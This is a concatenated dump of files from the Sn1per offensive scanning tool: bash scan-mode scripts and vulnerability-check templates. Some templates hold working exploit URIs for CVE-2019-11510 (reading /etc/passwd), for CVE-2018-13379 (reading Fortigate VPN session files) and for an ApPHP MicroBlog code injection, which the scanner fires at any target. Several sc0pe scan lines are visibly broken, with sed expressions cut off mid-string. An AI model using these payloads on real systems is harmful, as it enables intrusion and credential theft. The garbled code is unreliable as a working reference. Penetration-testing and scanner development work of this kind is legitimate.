[[ $SCAN_TYPE == "DOMAIN" ]] && [[ $OSINT == "1" ]]; then 2 | echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per stage 2 OSINT scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt 3 | if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then 4 | /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per stage 2 OSINT scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" 5 | fi 6 | if [[ $GOOHAK = "1" ]]; then 7 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 8 | echo -e "$OKRED RUNNING GOOGLE HACKING QUERIES $RESET" 9 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 10 | goohak $TARGET > /dev/null 11 | fi 12 | if [[ $INURLBR = "1" ]]; then 13 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 14 | echo -e "$OKRED RUNNING INURLBR OSINT QUERIES $RESET" 15 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 16 | php /usr/share/sniper/bin/inurlbr.php --dork "site:$TARGET" -s inurlbr-$TARGET | tee $LOOT_DIR/osint/inurlbr-$TARGET 17 | sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/osint/inurlbr-$TARGET > $LOOT_DIR/osint/inurlbr-$TARGET.txt 2> /dev/null 18 | rm -f $LOOT_DIR/osint/inurlbr-$TARGET 19 | rm -Rf output/ cookie.txt exploits.conf 20 | fi 21 | GHDB="1" 22 | echo "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per stage 2 OSINT scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt 23 | if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then 24 | /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per stage 2 OSINT scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" 25 | fi 26 | fi 27 | -------------------------------------------------------------------------------- /modes/sc0pe-active-webscan.sh: -------------------------------------------------------------------------------- 1 | for file in `ls $INSTALL_DIR/templates/active/*.sh 2> /dev/null`; do 2 | source $file 3 | OUTPUT_NAME=$(echo $VULN_NAME | sed -E 's/[^[:alnum:]]+/_/g') 4 | if [[ "$SSL" == "true" ]]; then 5 | if [[ -z "$PORT" ]]; then 6 | PORT="443" 7 | fi 8 | rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-https-$PORT-$OUTPUT_NAME.txt" 2> /dev/null 9 | curl --connect-timeout 3 --max-time 5 -k -X $METHOD $CURL_OPTS "https://${TARGET}:${PORT}${URI}" 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/${TARGET}_${OUTPUT_NAME}.out && echo "$SEVERITY, $VULN_NAME,https://${TARGET}:${PORT}${URI},$(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/ /dev/null && echo "[sn1persecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: https://${TARGET}:${PORT}${URI} - EVIDENCE: $(cat /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null 10 | else 11 | if [[ -z "$PORT" ]]; then 12 | PORT="80" 13 | fi 14 | rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-http-$PORT-$OUTPUT_NAME.txt" 2> /dev/null 15 | curl --connect-timeout 3 --max-time 5 -k -X $METHOD $CURL_OPTS "http://${TARGET}:${PORT}${URI}" 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/${TARGET}_${OUTPUT_NAME}.out && echo "$SEVERITY, $VULN_NAME,http://${TARGET}:${PORT}${URI},$(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/ /dev/null && echo "[sn1persecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: http://${TARGET}:${PORT}${URI} - EVIDENCE: $(cat /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null 16 | fi 17 | rm -f /tmp/${TARGET}_${OUTPUT_NAME}.out 2> /dev/null 18 | done -------------------------------------------------------------------------------- /modes/sc0pe-network-scan.sh: -------------------------------------------------------------------------------- 1 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 2 | echo -e "$OKRED RUNNING SC0PE NETWORK VULNERABILITY SCAN $RESET" 3 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 4 | for file in `ls $INSTALL_DIR/templates/passive/network/*.sh 2> /dev/null`; do 5 | source $file 6 | OUTPUT_NAME=$(echo $VULN_NAME | sed -E 's/[^[:alnum:]]+/_/g') 7 | if [[ "$SEARCH" == "negative" ]]; then 8 | rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt" 2> /dev/null 9 | cat $FILENAME 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/${TARGET}_${OUTPUT_NAME}.out || echo "$SEVERITY, $VULN_NAME, $TARGET, $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/ /dev/null && echo "[sn1persecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - $TARGET - EVIDENCE: $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null 10 | else 11 | rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt" 2> /dev/null 12 | cat $FILENAME 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/${TARGET}_${OUTPUT_NAME}.out && echo "$SEVERITY, $VULN_NAME, $TARGET, $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/ /dev/null && echo "[sn1persecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - $FILENME - EVIDENCE: $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null 13 | fi 14 | rm -f /tmp/${TARGET}_${OUTPUT_NAME}.out 2> /dev/null 15 | done 16 | 17 | for file in `ls $INSTALL_DIR/templates/passive/network/recursive/*.sh 2> /dev/null`; do 18 | source $file 19 | done 20 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" -------------------------------------------------------------------------------- /modes/sc0pe-passive-webscan.sh: -------------------------------------------------------------------------------- 1 | for file in `ls $INSTALL_DIR/templates/passive/web/*.sh 2> /dev/null`; do 2 | source $file 3 | OUTPUT_NAME=$(echo $VULN_NAME | sed -E 's/[^[:alnum:]]+/_/g') 4 | if [[ "$SEARCH" == "negative" ]]; then 5 | if [[ "$SSL" == "true" ]]; then 6 | if [[ -z "$PORT" ]]; then 7 | PORT="443" 8 | fi 9 | rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-https-$OUTPUT_NAME.txt" 2> /dev/null 10 | cat $FILENAME 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/${TARGET}_${OUTPUT_NAME}.out || echo "$SEVERITY, $VULN_NAME, https://$TARGET:$PORT/$URI, $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/ /dev/null && echo "[sn1persecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: $TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null 11 | else 12 | if [[ -z "$PORT" ]]; then 13 | PORT="80" 14 | fi 15 | rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-http-$OUTPUT_NAME.txt" 2> /dev/null 16 | cat $FILENAME 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/${TARGET}_${OUTPUT_NAME}.out || echo "$SEVERITY, $VULN_NAME, http://$TARGET:$PORT/$URI, $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/ /dev/null && echo "[sn1persecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: http://$TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null 17 | fi 18 | else 19 | if [[ "$SSL" == "true" ]]; then 20 | if [[ -z "$PORT" ]]; then 21 | PORT="443" 22 | fi 23 | rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-https-$OUTPUT_NAME.txt" 2> /dev/null 24 | cat $FILENAME 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/${TARGET}_${OUTPUT_NAME}.out && echo "$SEVERITY, $VULN_NAME, https://$TARGET:$PORT/$URI, $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/ /dev/null && echo "[sn1persecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: $TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null 25 | else 26 | if [[ -z "$PORT" ]]; then 27 | PORT="80" 28 | fi 29 | rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-http-$OUTPUT_NAME.txt" 2> /dev/null 30 | cat $FILENAME 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/${TARGET}_${OUTPUT_NAME}.out && echo "$SEVERITY, $VULN_NAME, http://$TARGET:$PORT/$URI, $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/ /dev/null && echo "[sn1persecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: http://$TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null 31 | fi 32 | fi 33 | rm -f /tmp/${TARGET}_${OUTPUT_NAME}.out 2> /dev/null 34 | done 35 | 36 | for file in `ls $INSTALL_DIR/templates/passive/web/recursive/*.sh 2> /dev/null`; do 37 | source $file 38 | done 39 | -------------------------------------------------------------------------------- /modes/sc0pe.sh: -------------------------------------------------------------------------------- 1 | echo "====================================================================================" | tee $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null 2 | CRITICAL_VULNS=$(egrep CRITICAL $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-*.txt 2> /dev/null | wc -l) 3 | HIGH_VULNS=$(egrep HIGH $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-*.txt 2> /dev/null | wc -l) 4 | MEDIUM_VULNS=$(egrep MEDIUM $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-*.txt 2> /dev/null | wc -l) 5 | LOW_VULNS=$(egrep LOW $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-*.txt 2> /dev/null | wc -l) 6 | INFO_VULNS=$(egrep INFO $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-*.txt 2> /dev/null | wc -l) 7 | VULN_SCORE=$(($CRITICAL_VULNS*5+$HIGH_VULNS*4+$MEDIUM_VULNS*3+$LOW_VULNS*2+$INFO_VULNS*1)) 8 | echo "•?((¯°·..• Sc0pe Vulnerability Report by @xer0dayz •._.·°¯))؟• " | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null 9 | echo "====================================================================================" | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null 10 | echo "Critical: $CRITICAL_VULNS" | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null 11 | echo "High: $HIGH_VULNS" | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null 12 | echo "Medium: $MEDIUM_VULNS" | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null 13 | echo "Low: $LOW_VULNS" | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null 14 | echo "Info: $INFO_VULNS" | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null 15 | echo "Score: $VULN_SCORE" | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null 16 | echo "$VULN_SCORE" 2> /dev/null > $LOOT_DIR/vulnerabilities/vulnerability-risk-$TARGET.txt 2> /dev/null | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null 17 | echo "====================================================================================" | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null 18 | egrep -h CRITICAL $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-*.txt 2> /dev/null | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null 19 | egrep -h HIGH $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-*.txt 2> /dev/null | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null 20 | egrep -h MEDIUM $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-*.txt 2> /dev/null | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null 21 | egrep -h LOW $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-*.txt 2> /dev/null | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null 22 | egrep -h INFO $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-*.txt 2> /dev/null | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null 23 | echo "====================================================================================" | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null 24 | sort -u $LOOT_DIR/vulnerabilities/sc0pe-*.txt > $LOOT_DIR/vulnerabilities/sc0pe-all-vulnerabilities-sorted.txt 2> /dev/null 25 | egrep "CRITICAL" $LOOT_DIR/vulnerabilities/sc0pe-all-vulnerabilities-sorted.txt 2> /dev/null | wc -l > $LOOT_DIR/vulnerabilities/critical_vulns_total.txt 26 | egrep "HIGH" $LOOT_DIR/vulnerabilities/sc0pe-all-vulnerabilities-sorted.txt 2> /dev/null | wc -l > $LOOT_DIR/vulnerabilities/high_vulns_total.txt 27 | egrep "MEDIUM" $LOOT_DIR/vulnerabilities/sc0pe-all-vulnerabilities-sorted.txt 2> /dev/null | wc -l > $LOOT_DIR/vulnerabilities/medium_vulns_total.txt 28 | egrep "LOW" $LOOT_DIR/vulnerabilities/sc0pe-all-vulnerabilities-sorted.txt 2> /dev/null | wc -l > $LOOT_DIR/vulnerabilities/low_vulns_total.txt 29 | egrep "INFO" $LOOT_DIR/vulnerabilities/sc0pe-all-vulnerabilities-sorted.txt 2> /dev/null | wc -l > $LOOT_DIR/vulnerabilities/info_vulns_total.txt 30 | WORKSPACE_RISK_CRITCAL=$(cat $LOOT_DIR/vulnerabilities/critical_vulns_total.txt 2> /dev/null) 31 | WORKSPACE_RISK_HIGH=$(cat $LOOT_DIR/vulnerabilities/high_vulns_total.txt 2> /dev/null) 32 | WORKSPACE_RISK_MEDIUM=$(cat $LOOT_DIR/vulnerabilities/medium_vulns_total.txt 2> /dev/null) 33 | WORKSPACE_RISK_LOW=$(cat $LOOT_DIR/vulnerabilities/low_vulns_total.txt 2> /dev/null) 34 | WORKSPACE_RISK_INFO=$(cat $LOOT_DIR/vulnerabilities/info_vulns_total.txt 2> /dev/null) 35 | WORKSPACE_RISK_TOTAL=$(($WORKSPACE_RISK_CRITCAL*5+$WORKSPACE_RISK_HIGH*4+$WORKSPACE_RISK_MEDIUM*3+$WORKSPACE_RISK_LOW*2+$WORKSPACE_RISK_INFO*1)) 36 | echo "$WORKSPACE_RISK_TOTAL" > $LOOT_DIR/vulnerabilities/vuln_score_total.txt 2> /dev/null -------------------------------------------------------------------------------- /modes/static-grep-search.sh: -------------------------------------------------------------------------------- 1 | if [[ $STATIC_GREP_SEARCH == "1" ]]; then 2 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 3 | echo -e "$OKRED RUNNING INTERESTING EXTENSIONS STATIC ANALYSIS $RESET" 4 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 5 | cat $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -iE "$GREP_EXTENSIONS" | tee $LOOT_DIR/web/static-extensions-$TARGET.txt | head -n $GREP_MAX_LINES 6 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 7 | echo -e "$OKRED RUNNING INTERESTING PARAMETERS STATIC ANALYSIS $RESET" 8 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 9 | grep '?' $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -iE "$GREP_PARAMETERS" | tee $LOOT_DIR/web/static-parameters-$TARGET.txt | head -n $GREP_MAX_LINES 10 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 11 | echo -e "$OKRED RUNNING XSS STATIC ANALYSIS $RESET" 12 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 13 | grep '?' $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -iE "$GREP_XSS" | tee $LOOT_DIR/web/static-xss-$TARGET.txt | head -n $GREP_MAX_LINES 14 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 15 | echo -e "$OKRED RUNNING SSRF STATIC ANALYSIS $RESET" 16 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 17 | grep '?' $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -iE "$GREP_SSRF" | tee $LOOT_DIR/web/static-ssrf-$TARGET.txt | head -n $GREP_MAX_LINES 18 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 19 | echo -e "$OKRED RUNNING REDIRECT STATIC ANALYSIS $RESET" 20 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 21 | grep '?' $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -iE "$GREP_REDIRECT" | tee $LOOT_DIR/web/static-redirect-$TARGET.txt | head -n $GREP_MAX_LINES 22 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 23 | echo -e "$OKRED RUNNING RCE STATIC ANALYSIS $RESET" 24 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 25 | grep '?' $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -iE "$GREP_RCE" | tee $LOOT_DIR/web/static-rce-$TARGET.txt | head -n $GREP_MAX_LINES 26 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 27 | echo -e "$OKRED RUNNING IDOR STATIC ANALYSIS $RESET" 28 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 29 | grep '?' $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -iE "$GREP_IDOR" | tee $LOOT_DIR/web/static-idor-$TARGET.txt | head -n $GREP_MAX_LINES 30 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 31 | echo -e "$OKRED RUNNING SQL STATIC ANALYSIS $RESET" 32 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 33 | grep '?' $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -iE "$GREP_SQL" | tee $LOOT_DIR/web/static-sql-$TARGET.txt | head -n $GREP_MAX_LINES 34 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 35 | echo -e "$OKRED RUNNING LFI STATIC ANALYSIS $RESET" 36 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 37 | grep '?' $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -iE "$GREP_LFI" | tee $LOOT_DIR/web/static-lfi-$TARGET.txt | head -n $GREP_MAX_LINES 38 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 39 | echo -e "$OKRED RUNNING SSTI STATIC ANALYSIS $RESET" 40 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 41 | grep '?' $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -iE "$GREP_SSTI" | tee $LOOT_DIR/web/static-ssti-$TARGET.txt | head -n $GREP_MAX_LINES 42 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 43 | echo -e "$OKRED RUNNING DEBUG STATIC ANALYSIS $RESET" 44 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 45 | grep '?' $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -iE "$GREP_DEBUG" | tee $LOOT_DIR/web/static-debug-$TARGET.txt | head -n $GREP_MAX_LINES 46 | fi -------------------------------------------------------------------------------- /modes/web.sh: -------------------------------------------------------------------------------- 1 | # WEB MODE ############################################################################################################# 2 | if [[ "$MODE" = "web" ]]; then 3 | if [[ "$REPORT" = "1" ]]; then 4 | if [[ ! -z "$WORKSPACE" ]]; then 5 | args="$args -w $WORKSPACE" 6 | LOOT_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE 7 | echo -e "$OKBLUE[*]$RESET Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET" 8 | mkdir -p $LOOT_DIR 2> /dev/null 9 | mkdir $LOOT_DIR/domains 2> /dev/null 10 | mkdir $LOOT_DIR/screenshots 2> /dev/null 11 | mkdir $LOOT_DIR/nmap 2> /dev/null 12 | mkdir $LOOT_DIR/notes 2> /dev/null 13 | mkdir $LOOT_DIR/reports 2> /dev/null 14 | mkdir $LOOT_DIR/scans 2> /dev/null 15 | mkdir $LOOT_DIR/output 2> /dev/null 16 | fi 17 | echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null 18 | echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt 19 | sniper -t $TARGET -m $MODE --noreport $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1 20 | exit 21 | fi 22 | fi 23 | -------------------------------------------------------------------------------- /pro/notepad.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | Notepad App 4 | 5 | 6 | 12 | 13 | 14 | 19 | 36 | 37 | -------------------------------------------------------------------------------- /sn1per.desktop: -------------------------------------------------------------------------------- 1 | [Desktop Entry] 2 | Name=sn1per 3 | Encoding=UTF-8 4 | Exec=bash-wrapper "sudo sniper" 5 | Icon=/usr/share/pixmaps/sn1per.png 6 | StartupNotify=false 7 | Terminal=true 8 | Type=Application 9 | Categories=08-exploitation-tools;02-vulnerability-analysis;01-info-gathering; 10 | X-Kali-Package=sn1per 11 | Comment= 12 | Path= 13 | -------------------------------------------------------------------------------- /sn1per.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1N3/Sn1per/179ac1e783de9ddc5b08e60e3dbd36e2e5399d00/sn1per.png -------------------------------------------------------------------------------- /templates/active/AWS_S3_Public_Bucket_Listing.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='AWS S3 Public Bucket Listing' 3 | URI='' 4 | METHOD='GET' 5 | MATCH="listbucket" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/ApPHP_MicroBlog_Remote_Code_Execution_Vulnerability.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='ApPHP MicroBlog Remote Code Execution Vulnerability' 3 | URI='/index.php?b);phpinfo();echo(base64_decode('T3BlblZBUwo')=/' 4 | METHOD='GET' 5 | MATCH="phpinfo\(\)" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Apache_Solr_Scanner.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Apache Solr Detected' 3 | URI='' 4 | METHOD='GET' 5 | MATCH="Solr\ Admin" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Apache_Tomcat_Scanner.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Apache Tomcat Detected' 3 | URI='/404_DOES_NOT_EXIST' 4 | METHOD='GET' 5 | MATCH="Apache\ Tomcat\/[0-9]?[0-9]\.[0-9]?[0-9]\.[0-9]?[0-9]" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-o' -------------------------------------------------------------------------------- /templates/active/AvantFAX_LOGIN_Detected.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='AvantFAX LOGIN Detected' 3 | URI='' 4 | METHOD='GET' 5 | MATCH="AvantFAX\ LOGIN" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2018-13379_-_Fortigate_Pulse_Connect_Secure_Directory_Traversal.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2018-13379 - Fortigate Pulse Connect Secure Directory Traversal' 3 | URI='/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession' 4 | METHOD='GET' 5 | MATCH='\.\.\.\.\.\.\.\.\.\.\.\.\.' 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2019-11510_-_Pulse_Connect_Secure_SSL_VPN_Arbitrary_File_Read.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2019-11510 - Pulse Connect Secure SSL VPN Arbitrary File Read' 3 | URI='/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/' 4 | METHOD='GET' 5 | MATCH="root:*:" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- 